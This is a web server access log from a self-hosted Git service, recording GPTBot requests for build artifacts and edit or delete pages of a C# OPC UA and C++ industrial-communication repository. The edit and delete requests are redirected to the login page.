+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:17:43:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:17:43:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:17:43:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:17:43:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcUaMinimal/obj/Debug" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug" -[17/Feb/2026:17:43:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcUaMinimal/obj/Debug" -[17/Feb/2026:17:43:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug" -[17/Feb/2026:17:43:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug" -[17/Feb/2026:17:43:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" -[17/Feb/2026:17:43:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" -[17/Feb/2026:17:43:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 987] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" -[17/Feb/2026:17:43:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 465] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" -[17/Feb/2026:17:43:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 967] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" -[17/Feb/2026:17:43:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" -[17/Feb/2026:17:43:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 10683] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" -[17/Feb/2026:17:43:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 10519] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" -[17/Feb/2026:17:43:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 9851] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" -[17/Feb/2026:17:43:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" -[17/Feb/2026:17:43:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 9857] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" -[17/Feb/2026:17:43:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 10294] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" -[17/Feb/2026:17:43:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 981] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" -[17/Feb/2026:17:43:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" -[17/Feb/2026:17:43:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" -[17/Feb/2026:17:43:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" -[17/Feb/2026:17:43:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" -[17/Feb/2026:17:43:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" -[17/Feb/2026:17:43:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" -[17/Feb/2026:17:43:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:17:43:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" -[17/Feb/2026:17:43:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" -[17/Feb/2026:17:43:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" -[17/Feb/2026:17:43:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" -[17/Feb/2026:17:43:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" -[17/Feb/2026:17:43:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" -[17/Feb/2026:17:43:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 11022] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:17:43:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12062] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:17:43:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" -[17/Feb/2026:17:43:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" -[17/Feb/2026:17:43:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" -[17/Feb/2026:17:43:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" -[17/Feb/2026:17:43:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 10993] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:17:43:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11184] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:43:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:43:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:17:43:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:43:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11164] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:43:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11163] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:43:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11186] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:43:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:17:43:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:43:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:17:43:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11184] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:43:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:17:43:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.07] 